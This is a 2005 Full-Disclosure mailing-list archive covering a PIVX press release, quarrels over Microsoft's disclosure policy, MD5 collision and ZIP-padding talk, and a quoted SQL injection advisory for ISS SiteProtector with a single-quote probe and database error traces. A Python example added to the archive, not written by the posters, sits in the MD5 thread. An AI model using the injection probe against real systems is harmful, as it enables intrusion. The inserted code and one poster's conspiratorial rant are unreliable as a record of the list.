`:::.. ?::|::. :::|::: .::|::? ..::;'
`:::::. ':|::. :::|::: .::|:' ,::::;'
`:::::. ':|:::::|:::::|:' :::::;'
`:::::.:::::|::::|::::|::::.,:::;'
':::::::::|:::|:::|:::::::;:'
':::::::|::|::|:::::::''
`::::::::::;'
.:;'' ::: ``::.
:':':
CHA!
From: Jason Coombs (jasonc
science.org)
Date: Fri Apr 08 2005 - 15:22:06 CDT
Lotus Fund Acquires Controlling Interest in PIVX Solutions From
Co-Founders; Seeks to Leverage Company's Unique Windows Security Technology
NEWPORT BEACH, Calif.--(BUSINESS WIRE)--April 7, 2005--PIVX Solutions,
Inc. (OTCBB:PIVX), the leader in next generation Windows Host-Based
Intrusion Prevention software, announces today that the private equity
firm Lotus Fund has increased their holdings in PIVX to become the
controlling shareholder of the company.
"We are very excited about the IT security industry, and we view host
intrusion prevention as the next significant area of growth within that
industry," said Tydus Richards, director at Lotus Fund and the new
Chairman of the Board at PIVX. "We evaluated many different companies in
this space and are impressed with the technology, the team and the
momentum at PIVX. Given the continually growing threats to PC users,
PIVX's products provide the protection that Windows users must have to
be truly protected against hackers and the malware they deploy. The
co-founders of PIVX have a legacy to be proud of and now we are
assembling the team to take the Company to the next level."
The company's primary software product, Qwik-Fix Pro, is designed to
proactively block known and unknown software threats in all versions of
Microsoft Windows and Internet Explorer. Using Active System Hardening
technology, Qwik-Fix Pro combines automatic remediation of critical
software security flaws with targeted configuration management. This
host-based technology is driven by world-class security research and
mitigates critical software vulnerabilities well before Microsoft
releases a patch or an anti-virus signature is written.
"Defective software represents the greatest security risk facing
organizations today. With tens of millions of lines of code in Microsoft
Windows, the potential for abuse is extremely high and will continue to
plague industries that rely upon this platform," said PIVX CTO, Alex
Tosheff. "Windows users must take a different approach to mitigating
this risk and by using a product like Qwik-Fix Pro as a key component in
a layered-security approach, they can achieve the best possible
protection against the greatest number of threats. In many cases, we are
providing the 'patch before the patch.'"
"We are very pleased that we are having success on multiple fronts,"
said Luis Curet, Interim CEO and senior vice president of sales and
marketing at PIVX. "We are seeing increased traction within our OEM,
International, Enterprise, Consumer and Forensic Services groups. It is
clear that companies understand the unique value proposition that we
provide. In addition, we're seeing a huge number of downloads of
Pre>View, our recently launched security scorecard application for
Windows computers."
PIVX will hold an investor conference call at 4:15 p.m. Eastern Standard
Time on Thursday, April 14, 2005. PIVX Solution's Chairman of the Board
Tydus Richards and PIVX's Interim CEO Luis Curet will host the call.
To hear the conference call as it takes place:
-- Call 1-800-434-1335 in the United States or Canada or;
-- Call 1-404-920-6620 in the Atlanta Area or Internationally
-- Pin Code: 646636
-- Exclusive: For Expedited Entry into the Conference: Please
register via this link for your Direct Access 800 number.
www.AccuConference.com/PIVX
To hear a recording of the call (available immediately following the
call by telephone for 30 days after the call takes place):
-- Call 1-800-977-8002 in the United States or Canada or;
-- Call 1-404-920-6650 in the Atlanta Area or Internationally
-- Pin Code: Press * then 646636
About PIVX
PIVX Solutions, Inc. (OTCBB:PIVX) is a security research product and
services company that leverages its domain knowledge to increase the
security of corporate PCs and servers and the Internet infrastructure.
PIVX also conducts highly confidential security-related work on behalf
of some of the world's largest corporations. PIVX research has
identified multiple vulnerabilities and ways to exploit many of the
world's widely used Operating Systems and software including Microsoft
Windows, Microsoft IIS, Unreal Engine, Microsoft Internet Explorer,
Cisco IOS and Turbo Tax.
For more information, please visit www.pivx.com or call 949-999-1600.
Forward-Looking Statements
The statements contained in this press release that are not historical
are "forward-looking statements" within the meaning of Section 27A of
the Securities Act of 1933, as amended (the "Securities Act"), and
Section 21E of the Securities Exchange Act of 1934, as amended (the
"Exchange Act"), including statements, without limitation, regarding our
expectations, beliefs, intentions or strategies regarding the future.
PIVX intends that such forward-looking statements be subject to the
safe-harbor provided by the Private Securities Litigation Reform Act of
1995. Such forward-looking statements relate to, among other things: (1)
PIVX's successful integration of Threat Focus; (2) PIVX's expected
revenue and earnings growth; and (3) estimates regarding the size of
target markets. These statements are qualified by important factors that
could cause PIVX actual results to differ materially from those
reflected by the forward-looking statements. Such factors include but
are not limited to: (1) PIVX's ability to obtain development financing
as and when needed, (2) PIVX's ability to generate and sustain
profitable operations; (3) the market's acceptance of PIVX's products
and services; (4) significant competition from other network security
companies and operating system providers with significantly greater
technological, marketing and financial resources, and (5) PIVX's ability
to protect its intellectual property. These statements, and other
forward-looking statements, are not guarantees of future performance and
involve risks and uncertainties as more fully described in the Company's
periodic filings with the Securities and Exchange Commission.
CONTACT: Redwood Consultants, LLC
Jens Dalsgaard, 415-884-0348
JNSD
aol.com
SOURCE: PIVX Solutions, Inc.
From: Danny (nocmonkey
gmail.com)
Date: Fri Apr 08 2005 - 15:26:20 CDT
On Apr 8, 2005 2:59 PM, lor.tharholm
hushmail.com
<lor.tharholm
hushmail.com> wrote:
> .:.
> :|:
> .:|:.
> ::|::
> :. ::|:: .:
> :|:. .::|::. .:|:
> ::|:. :::|::: .:|:;
> `::|:. :::|::: .:|::'
> ::|::. :::|::: .::|:;
> `::|::. :::|::: .::|::'
> :::|::. :::|::: .::| ::;
> `:::|::. :::|::: .::|::;'
> `::. `:::|::. :::|::: .::|::;' .:;'
> `:::.. ?::|::. :::|::: .::|::? ..::;'
> `:::::. ':|::. :::|::: .::|:' ,::::;'
> `:::::. ':|:::::|:::::|:' :::::;'
> `:::::.:::::|::::|::::|::::.,:::;'
> ':::::::::|:::|:::|:::::::;:'
> ':::::::|::|::|:::::::''
> `::::::::::;'
> .:;'' ::: ``::.
> :':':
>
> CHA!
Check out http://www.marijuanaparty.com/
High fives,
Ketchup Eyes
From: Micheal Espinola Jr (michealespinola
gmail.com)
Date: Fri Apr 08 2005 - 15:26:27 CDT
On Apr 8, 2005 4:17 PM, Georgi Guninski <guninski
guninski.com> wrote:
> On Fri, Apr 08, 2005 at 12:21:05PM -0700, Microsoft Security Response
> Center wrote:
> > If you believe you have found a security vulnerability affecting a
> > Microsoft product, we would like to work with you to investigate it.
> >
>
> hahahahahaha
>
> m$ doing social engineering on fd, this is a joke.
>
> *You would rather they ignore the issue?*
> basically they want your 0days so billg becomes more rich.
>
> *Wow, jealous much?*
> --
> where do you want bill gates to go today?
--
ME2
From: Danny (nocmonkey
gmail.com)
Date: Fri Apr 08 2005 - 15:30:38 CDT
On Apr 8, 2005 4:16 PM, Jason Coombs <jasonc
science.org> wrote:
> Lotus Fund Acquires Controlling Interest in PIVX Solutions From
> Co-Founders; Seeks to Leverage Company's Unique Windows Security Technology
>
> NEWPORT BEACH, Calif.--(BUSINESS WIRE)--April 7, 2005--PIVX Solutions,
> Inc. (OTCBB:PIVX), the leader in next generation Windows Host-Based
> Intrusion Prevention software, announces today that the private equity
> firm Lotus Fund has increased their holdings in PIVX to become the
> controlling shareholder of the company.
>
> "We are very excited about the IT security industry, and we view host
> intrusion prevention as the next significant area of growth within that
> industry," said Tydus Richards, director at Lotus Fund and the new
> Chairman of the Board at PIVX. "We evaluated many different companies in
> this space and are impressed with the technology, the team and the
> momentum at PIVX. Given the continually growing threats to PC users,
> PIVX's products provide the protection that Windows users must have to
> be truly protected against hackers and the malware they deploy. The
> co-founders of PIVX have a legacy to be proud of and now we are
> assembling the team to take the Company to the next level."
>
> The company's primary software product, Qwik-Fix Pro, is designed to
> proactively block known and unknown software threats in all versions of
> Microsoft Windows and Internet Explorer. Using Active System Hardening
[...]
What is this a press release mailing list? Full-pivx-disclosure?
PIVX gives my Windows box a hard-on-ing.
...D
From: Jason Coombs (jasonc
science.org)
Date: Fri Apr 08 2005 - 15:41:31 CDT
Georgi Guninski wrote:
> basically they want your 0days
> so billg becomes more rich.
Aloha, Georgi.
If only it were a simple business motive, everyone could dismiss it as such.
The real motive is more sinister.
Microsoft wants to perpetuate the misperception that secrecy makes people safer.
You and I and much of FD know this is not true, and anyone who has been in business for any length of time knows that if we could only disclose our secrets without having our lives destroyed as a result, we could prove beyond any doubt that business is the most harmful force of destruction that exists today.
We all go on with our daily lives believing that our neighbor won't harm themselves by disclosing their secrets, so we don't disclose ours. It is a perpetual stalemate.
Business depends on secrets for viability.
Without business, governments collapse and the World enters War Version 3.
Coincidence that Microsoft gets everything right on the third try?
Microsoft is attempting nothing short of social engineering to spread the worldwide belief that business stability equals safety for all.
Microsoft has grown influential enough that they now care deeply about world stability. They depend on it for profit growth, in fact.
The fact is, a world war is far more likely when secrets become compulsory. When good people become afraid to speak the truth, war is guaranteed.
Microsoft won't believe this until it is too late. Therefore, good people must stand up now and speak the truth.
MICROSOFT: STOP THE WAR! NO MORE SECRETS!
Regards, and best wishes,
Jason Coombs
jasonc
science.org
-----Original Message-----
From: Georgi Guninski <guninski
guninski.com>
Date: Fri, 8 Apr 2005 23:17:08
To:full-disclosure
lists.grok.org.uk
Subject: Re: [Full-disclosure] How to Report a Security Vulnerability to
Microsoft
On Fri, Apr 08, 2005 at 12:21:05PM -0700, Microsoft Security Response Center wrote:
> If you believe you have found a security vulnerability affecting a
> Microsoft product, we would like to work with you to investigate it.
>
hahahahahaha
m$ doing social engineering on fd, this is a joke.
basically they want your 0days so billg becomes more rich.
--
where do you want bill gates to go today?
From: Jason Coombs (jasonc
science.org)
Date: Fri Apr 08 2005 - 15:47:38 CDT
nocmonkey
gmail.com wrote:
> What is this a press release mailing
> list? Full-pivx-disclosure?
So it's okay for anonymous cowards who want to perpetrate financial crimes to post nonsense to the list, but I'm not allowed to?
Nice.
Jason Coombs
jasonc
science.org
From: Danny (nocmonkey
gmail.com)
Date: Fri Apr 08 2005 - 16:05:06 CDT
On Apr 8, 2005 4:44 PM, Jason Coombs <jasonc
science.org> wrote:
> nocmonkey
gmail.com wrote:
> > What is this a press release mailing
> > list? Full-pivx-disclosure?
>
> So it's okay for anonymous cowards who want to perpetrate financial crimes to post
> nonsense to the list, but I'm not allowed to?
>
> Nice.
Shouldn't you let PIVX decide what to defend and what not to defend?
...D
From: Morning Wood (se_cur_ity
hotmail.com)
Date: Fri Apr 08 2005 - 16:16:06 CDT
> On Fri, Apr 08, 2005 at 12:21:05PM -0700, Microsoft Security Response
Center wrote:
> > If you believe you have found a security vulnerability affecting a
> > Microsoft product, we would like to work with you to investigate it.
> >
>
> hahahahahaha
>
> m$ doing social engineering on fd, this is a joke.
this is basically the same response I had from my OWA advisory ...
>VI. VENDOR RESPONSE
>
>Microsoft has reviewed the issue and has made the determination that
>while a bug fix may be implemented in a future service pack, a security
>advisory/patch will not be released for this issue
therefore, in the interest of everyone's security, iDefense released the
advisory ( as did I ) without a patch being released first.
it is quite possible they ( Microsoft ) are trying to make out like they
weren't contacted before said advisory was released.... but that is just my
opinion on observation.
my 2 bits,
Donnie Werner
From: Thierry Zoller (Thierry
sniff-em.com)
Date: Fri Apr 08 2005 - 17:00:42 CDT
Dear Barry,
b> Of course it's possible. All hashes, by their very nature, have
b> collisions. The only way to have a truly unique identifier is to use
b> the actual content of the file (or chunk) itself. The minute you
b> distill the content down to a hash, you're guaranteeing that collisions
b> will occur.
You are correct of course, the possibility is there. I was referring to
the fact that it is possible in another post of mine, however the possibility
of collisions happening "naturally" is "not very likely" to say the least.
I still need to hear about anybody who found a non-fabricated md5 collision
in the wild..on files.
b> somewhat rare.
:) Warm food at McDonald's is "somewhat rare". Naturally occurring md5 (or
coll. in sophisticated hash functions in general) are VERY rare not to
say virtually impossible. AFAIK <-
b> Regarding corrupt files via P2P protocols... no file transfered via P2P
b> has _ever_ tranferred bad data and wound up corrupt, right? :)
b> /friendly sarcasm.
Hehe, got that one :)
--
Thierry Zoller
From: Thierry Zoller (Thierry
sniff-em.com)
Date: Fri Apr 08 2005 - 17:05:09 CDT
Dear Jason,
J> I think that entirely depends on the format the file is distributed in.
J> You could take a zipfile and pad it in non critical areas to change the
J> MD5 without creating a substantial difference in the deliverable
J> content. You could do the same with gzip or bzip formatted files. You
J> could also pad any embedded jpeg images to engineer a collision. There
J> are quite a few opportunities where this method could be used to twiddle
J> the new MD5 without materially changing the content.
Clever approach there, haven't thought about that beforehand.
J> Software that is ~150M in size, it gets redistributed as a new file that
J> is 160M is size but has a collision with your software which is also
J> 160M in size. I imagine there would be some computational time involved
J> to find the appropriate collision but a lot less computational time than
J> finding a perfect match to the original.
If I understood your point correctly and if my knowledge about hash
algos is correct then, to my belief, the computational time to generate
a collision is exactly the same for the perfect match as it would be
to use an existing file to create a potential collision.
--
Thierry Zoller
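An added example (not from either poster) that puts numbers on both points in these two posts: the birthday bound behind "naturally occurring" MD5 collisions being rare, and the padding idea shown on a ZIP whose archive comment is padded so the container's MD5 and size change while the extracted members stay identical, beside a fingerprint over the members themselves that such padding cannot shift. SAMPLE_PAYLOAD and the 4096-byte padding are constructed.

```python
"""Put numbers on the two MD5 points in the thread.  Added example, not from
either poster: (1) the birthday bound on 'naturally occurring' collisions for
an ideal 128-bit hash, and (2) a ZIP whose archive comment is padded so the
container's MD5 and size change while every extracted member is identical,
next to a fingerprint over the members themselves that survives such
padding.  SAMPLE_PAYLOAD is constructed data."""
import hashlib
import io
import math
import zipfile

MD5_BITS = 128
ZIP_MAX_COMMENT = 0xFFFF  # comment length is a 16-bit field in the end record

SAMPLE_PAYLOAD = {  # constructed sample archive contents
    "readme.txt": b"release notes, constructed sample\n",
    "data.bin": bytes(range(256)) * 8,
}


def birthday_collision_probability(n_files, hash_bits=MD5_BITS):
    """P(at least one collision among n_files distinct inputs) for an ideal
    hash: 1 - exp(-n(n-1) / 2^(bits+1)).  expm1 keeps tiny results exact."""
    space = 2.0 ** hash_bits
    return -math.expm1(-(n_files * (n_files - 1)) / (2.0 * space))


def files_for_collision_probability(p, hash_bits=MD5_BITS):
    """Inverse of the above: distinct files needed before a natural collision
    has probability p (about 2.2e19 for p = 0.5 with a 128-bit hash)."""
    return math.sqrt(-2.0 * (2.0 ** hash_bits) * math.log1p(-p))


def make_zip(payload, comment=b""):
    """Deterministic ZIP (fixed timestamps, deflate) so two builds of the same
    payload differ only where we intend them to."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in sorted(payload):
            info = zipfile.ZipInfo(name, date_time=(1980, 1, 1, 0, 0, 0))
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, payload[name])
        zf.comment = comment
    return buf.getvalue()


def extract_all(zip_bytes):
    """Member name -> member bytes for every entry in the archive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def pad_zip_comment(zip_bytes, padding):
    """Rebuild the archive with `padding` appended to its comment: same
    members, different container bytes.  Rejects padding the format cannot
    carry (the comment field is limited to 65535 bytes)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        comment = zf.comment + padding
        members = {info.filename: zf.read(info) for info in zf.infolist()}
    if len(comment) > ZIP_MAX_COMMENT:
        raise ValueError("ZIP comment limited to %d bytes" % ZIP_MAX_COMMENT)
    return make_zip(members, comment)


def content_fingerprint(zip_bytes):
    """SHA-256 over the members (name and bytes, length-prefixed, sorted):
    unaffected by comment padding, timestamps or compression settings, so
    it identifies the delivered content rather than the container."""
    h = hashlib.sha256()
    for name, data in sorted(extract_all(zip_bytes).items()):
        encoded = name.encode("utf-8")
        h.update(len(encoded).to_bytes(4, "big") + encoded)
        h.update(len(data).to_bytes(8, "big") + data)
    return h.hexdigest()


if __name__ == "__main__":
    print("P(collision) among 10^9 files: %.3g" % birthday_collision_probability(10 ** 9))
    print("files for a 50%% chance: %.3g" % files_for_collision_probability(0.5))
    original = make_zip(SAMPLE_PAYLOAD)
    padded = pad_zip_comment(original, b"\0" * 4096)
    print("md5 original:", md5_hex(original), len(original))
    print("md5 padded:  ", md5_hex(padded), len(padded))
    print("same members:", extract_all(original) == extract_all(padded))
    print("fingerprints equal:", content_fingerprint(original) == content_fingerprint(padded))
```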
From: sHz (shaond
gmail.com)
Date: Fri Apr 08 2005 - 18:16:39 CDT
I don't know how Windows IT pro magazine even came up with this silly
idea. Everyone (almost) knows that nothing remains impenetrable for
long! Not only that, but these contests give certain people
(managers/some admins) a false sense of security.
Then again, I want to see the box hacked to shreds :-)
sHz
From: Astharot (astharot
zone-h.org)
Date: Fri Apr 08 2005 - 13:52:21 CDT
The graphical statistics for the year 2004 are finally ready! They also
contain excerpts of the years 2002 and 2003 when needed.
There are two files:
a nice PDF document which can be downloaded here
http://www.zone-h.org/download/file=5392/
while the full set of data in txt format, ready to be imported in your
spreadsheet can be downloaded here:
http://www.zone-h.org/download/file=5393/
The PDF documents contain a useful disclaimer about Zone-H activity,
read it please. You might be disappointed discovering that this year we
made no comments on the graphs. It is simply because the graphs are
self-talking.
Beside this, we always get emails like: "hey, why don't you make a graph
comparing the different webservers? It might be useful!" and "hey, why
did you do that graph comparing the webserver? It's useless!". To avoid
this, this year we did all possible graphs, up to you which one to
consider and how to interpret it.
I just want to add one comment: the tendency is to break through the
application level, we started to tell it a couple of years ago, much
earlier than anyone else. This is possible thanks to having the large
database as we have.
Enjoy the statistics but remember that this material is copyrighted and
you can use it under the same license it's currently serving our website.
At the end of the PDF file you will find the details
Enjoy!
SyS64738 - Roberto Preatoni
astharot - Gerardo Di Giacomo
www.zone-h.org
Original article:
- http://zone-h.org/en/news/read/id=4457/
From: n3td3v (xploitable
gmail.com)
Date: Fri Apr 08 2005 - 20:20:32 CDT
On Apr 9, 2005 12:16 AM, sHz <shaond
gmail.com> wrote:
> I don't know how Windows IT pro magazine even came up with this silly
> idea. Everyone (almost) knows that nothing remains impenetrable for
> long! Not only that, but these contests give certain people
> (managers/some admins) a false sense of security.
>
> Then again, I want to see the box hacked to shreds :-)
>
> sHz
Hi,
Remember the end goal for these morons is to sell more magazines. If
you read the website, the guy is going to do a big feature on all the
events that take place before/middle and after the contest. They know
people will buy the magazine to read it, that's why the contest is
being held.
Read more about what I think here:
http://blog.360.yahoo.com/blog-DDhkxBU_KLIDKLXKywM-?l=6&u=11&mx=44&lmt=5&p=137
Thanks, n3td3v
From: Jason (security
brvenik.com)
Date: Fri Apr 08 2005 - 21:25:11 CDT
Thierry Zoller wrote:
> Dear Jason,
>
> J> I think that entirely depends on the format the file is distributed in.
> J> You could take a zipfile and pad it in non critical areas to change the
> J> MD5 without creating a substantial difference in the deliverable
> J> content. You could do the same with gzip or bzip formatted files. You
> J> could also pad any embedded jpeg images to engineer a collision. There
> J> are quite a few opportunities where this method could be used to twiddle
> J> the new MD5 without materially changing the content.
>
> Clever approach there, haven't thought about that beforehand.
Different approaches are rarely thought about beforehand. If they were
explored deeply we might have found efficiencies and complications that
would have been avoided. This security stuff might not even exist. We
would also never make progress.
>
> J> Software that is ~150M in size, it gets redistributed as a new file that
> J> is 160M is size but has a collision with your software which is also
> J> 160M in size. I imagine there would be some computational time involved
> J> to find the appropriate collision but a lot less computational time than
> J> finding a perfect match to the original.
>
> If I understood your point correctly and if my knowledge about hash
> algos is correct then to my belief the computational time to generate
> a collision is exactly the same for the perfect match as it would be
> to use an existing file to create a potential collision.
>
I've not looked into it to be honest. I am thinking aloud.
Are there cases where different bits will have a predictable and
definable impact on the resulting hash? Does a null byte have a more
defined impact than a non null byte? Can you use a minimal impact byte
as padding and more impactful byte sequences to complete the collision?
It was once said that you could not realistically create two different
sets of data that would cause a hash collision.
It was once said that you could not exploit heap overflows and that
stack overflows did not allow for control of the machine.
It was once thought that you could not use a format string to create an
exploitable condition.
I see enough opportunities for motivated people to do the research and
create a solution that is not computationally prohibitive. I would not
be surprised if this happens in relatively short time.
To use the existence of a hash and size as justification for a legal
assault against a person that appears to be providing content which is
under protection of some law presents an interesting area of exploration
in the courts for the right team. It was once thought that being found
guilty by a jury was sufficient to put someone to death. DNA has changed
that!
The only difference between theory and reality is implementation.
I think I am done with the thread on FD. Apologies to the myopic
thinkers among us.
From: grey hat (greyhat007
gmail.com)
Date: Fri Apr 08 2005 - 21:36:52 CDT
It's www.iss.net and not www.iss.com....
On Apr 8, 2005 12:25 PM, Francisco Amato <famato
infobyte.com.ar> wrote:
> ||
> || [ISR]
> || Infobyte Security Research
> || www.infobyte.com.ar
> || 04.08.2005
> ||
>
> .:: SUMMARY
>
> ISS - SiteProtector Console Sql-Injection
>
> Version: 2.0.5.690. It is suspected that all previous versions of
> SiteProtector Console are vulnerable.
>
> .:: BACKGROUND
>
> SiteProtector is a security management system that provides a centralized
> view and analysis of network, server, and desktop protection agents and appliances.
>
> http://www.iss.com
>
> .:: DESCRIPTION
>
> A Sql-injection vulnerability affects SiteProtector Console.
> This issue is due to a failure of the application to securely copy
> user-supplied data into the fields "Tag Name" and "Object Name" of the
> Incidents/Exceptions that a user creates or modifies.
>
> Simple string use: "'"
>
> Error displayed when the injection is made:
>
> ######################BEGIN############################
>
> A Database or SQL Error occurred while working with Site Rules.
> net.iss.rssp.gui.site.analysis.exceptions.CommonSiteRuleException
> at net.iss.rssp.gui.site.analysis.AnalysisDataManager.throwCommonSiteRuleException(AnalysisDataManager.java:442)
> at net.iss.rssp.gui.site.analysis.AnalysisDataManager.createSiteFilter(AnalysisDataManager.java:350)
> at net.iss.rssp.gui.site.analysis.command.AddEditSiteRuleCommand.execute(AddEditSiteRuleCommand.java:48)
> at net.iss.command.CommandTemplate.templateExecute(CommandTemplate.java:179)
> at net.iss.command.CommandHandler.executeCommand(CommandHandler.java:148)
> at net.iss.command.CommandHandler.run(CommandHandler.java:116)
>
> A database error occurred in the method "createNewSiteRule".
> net.iss.rssp.entity.exceptions.SiteRuleException
> at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:357)
> at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
> at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> Database Error
> SQL State = 42000
> Vendor code = 105
> Vendor msg = [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')
> AND NOT EXISTS (SELECT 1
> FROM ObservanceSiteFilters OSF WITH (NOLOCK)
> WHERE OSF.ObservanceID = OB.ObservanceID
> AND OSF.SiteFilterRuleID = 853)'.
>
> net.iss.rssp.db.DataAccessException
> at net.iss.rssp.server.database.DatabaseObjectHandlerBase.handleSQLException(DatabaseObjectHandlerBase.java:75)
> at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:134)
> at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
> at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
> at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> Error Inserting into table ObservanceSiteFilters Code: 52000 DB Key: 0
>
> java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')
> AND NOT EXISTS (SELECT 1
> FROM ObservanceSiteFilters OSF WITH (NOLOCK)
> WHERE OSF.ObservanceID = OB.ObservanceID
> AND OSF.SiteFilterRuleID = 853)'.
>
> at ids.sql.IDSSocket.error(IDSSocket.java:325)
> at ids.sql.IDSSocket.verify(IDSSocket.java:270)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
> at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:103)
> at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
> at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
> at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')
> AND NOT EXISTS (SELECT 1
> FROM ObservanceSiteFilters OSF WITH (NOLOCK)
> WHERE OSF.ObservanceID = OB.ObservanceID
> AND OSF.SiteFilterRuleID = 853)'.
>
> at ids.sql.IDSSocket.error(IDSSocket.java:325)
> at ids.sql.IDSSocket.verify(IDSSocket.java:270)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
> at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:103)
> at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
> at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
> at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Line 10: Incorrect syntax near '')
> AND NOT EXISTS (SELECT 1
> FROM ObservanceSiteFilters OSF WITH (NOLOCK)
> WHERE OSF.ObservanceID = OB.ObservanceID
> AND O'.
>
> at ids.sql.IDSSocket.error(IDSSocket.java:325)
> at ids.sql.IDSSocket.verify(IDSSocket.java:270)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
> at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:103)
> at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
> at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
> at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
